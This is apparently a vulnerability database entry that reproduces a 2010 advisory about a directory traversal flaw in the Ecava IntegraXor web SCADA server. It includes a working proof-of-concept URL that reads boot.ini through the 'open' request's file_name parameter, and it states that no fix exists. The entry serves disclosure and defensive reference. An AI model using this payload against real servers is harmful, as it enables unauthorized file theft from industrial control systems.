ID
VAR-E-201012-0023
TITLE
Ecava IntegraXor 3.6.4000.0 Directory Traversal
Trust: 0.5
DESCRIPTION
Ecava IntegraXor versions 3.6.4000.0 and below suffer from a directory traversal vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | ecava | model: | integraxor | scope: | eq | version: | 3.6.4000.0 | Trust: 0.5 |
EXPLOIT
#######################################################################
Luigi Auriemma
Application: Ecava IntegraXor
http://www.integraxor.com
Versions: <= 3.6.4000.0
Platforms: Windows
Bug : directory traversal
Exploitation: remote, versus server
Date: 21 Dec 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
IntegraXor is a web SCADA server used primarily in Malaysia.
#######################################################################
======
2) Bug
======
The "open" request can be used by an attacker to download files from
the disk where the server is installed through directory traversal
attacks.
#######################################################################
===========
3) The Code
===========
http://SERVER:7131/PROJECT_NAME/open?file_name=..\..\..\..\..\..\..\..\..\..\..\boot.ini
where PROJECT_NAME is the name of one of the projects hosted by the
server.
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
CREDITS
Luigi Auriemma
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 96866 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 96866 |
LAST UPDATE DATE
2022-07-27T09:25:14.022000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 96866 | date: | 2010-12-21T18:05:30 |